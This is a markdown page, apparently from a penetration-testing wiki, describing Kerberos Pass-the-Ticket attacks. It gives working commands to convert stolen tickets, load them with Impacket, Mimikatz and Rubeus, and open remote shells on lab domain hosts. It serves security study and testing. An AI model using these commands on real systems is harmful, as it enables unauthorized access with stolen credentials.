pass-the-ticket.md (3429B)
1 --- 2 title: "Pass the Ticket" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/pass-the-ticket.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/pass-the-ticket.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Pass the Ticket 14 15 ## Overview 16 17 In a Pass-the-Ticket (PtT) attack, an adversary uses a stolen Kerberos ticket to authenticate as the ticket's principal without possessing that account's password. A ticket-granting ticket (TGT) can be used to request service tickets, while a stolen service ticket is limited to its target service and validity period.<sup>[[1]](#references)</sup> 18 19 For ticket acquisition techniques, see: 20 21 - [Harvesting tickets from Windows](/hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows) 22 - [Harvesting tickets from Linux](/hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux) 23 24 ## Converting Linux and Windows Ticket Formats 25 26 Kerberos caches commonly appear as MIT `ccache` files on Linux and `.kirbi` files on Windows. `ticket_converter` converts between these formats using an input ticket and output path.<sup>[[2]](#references)</sup> 27 28 ```bash 29 python ticket_converter.py velociraptor.ccache velociraptor.kirbi 30 # Expected message: Converting ccache => kirbi 31 python ticket_converter.py velociraptor.kirbi velociraptor.ccache 32 # Expected message: Converting kirbi => ccache 33 ``` 34 35 Kekeo also provides Kerberos ticket tooling on Windows.<sup>[[3]](#references)</sup> 36 37 ## Using a Ticket 38 39 On Linux, point `KRB5CCNAME` to the cache and instruct an Impacket client to use Kerberos without prompting for a password:<sup>[[4]](#references)</sup> 40 41 ```bash 42 export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK 43 python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass 44 ``` 45 46 On Windows, Mimikatz or Rubeus can import a `.kirbi` ticket into the current logon session. Use `klist` to inspect the resulting cache.<sup>[[5]](#references)[[6]](#references)</sup> 47 48 ```powershell 49 mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi" 50 .\Rubeus.exe ptt /ticket:'[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi' 51 klist 52 .\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd 53 ``` 54 55 Ticket import does not grant privileges beyond those represented by the ticket and the target service's authorization policy. Expired, revoked, malformed, or incorrectly scoped tickets may fail.<sup>[[1]](#references)</sup> 56 57 For broader Kerberos attack context and related ticket-acquisition techniques, see Tarlogic's Kerberos attack guide.<sup>[[7]](#references)</sup> 58 59 ## References 60 61 - [1] [MITRE ATT&CK T1550.003 - Pass the Ticket](https://attack.mitre.org/techniques/T1550/003/) 62 - [2] [Zer1t0 - `ticket_converter`](https://github.com/Zer1t0/ticket_converter) 63 - [3] [gentilkiwi - Kekeo](https://github.com/gentilkiwi/kekeo) 64 - [4] [Fortra - Impacket examples](https://github.com/fortra/impacket/tree/master/examples) 65 - [5] [gentilkiwi - Mimikatz](https://github.com/gentilkiwi/mimikatz) 66 - [6] [GhostPack - Rubeus](https://github.com/GhostPack/Rubeus) 67 - [7] [Tarlogic - Kerberos attack techniques](https://www.tarlogic.com/blog/how-to-attack-kerberos/)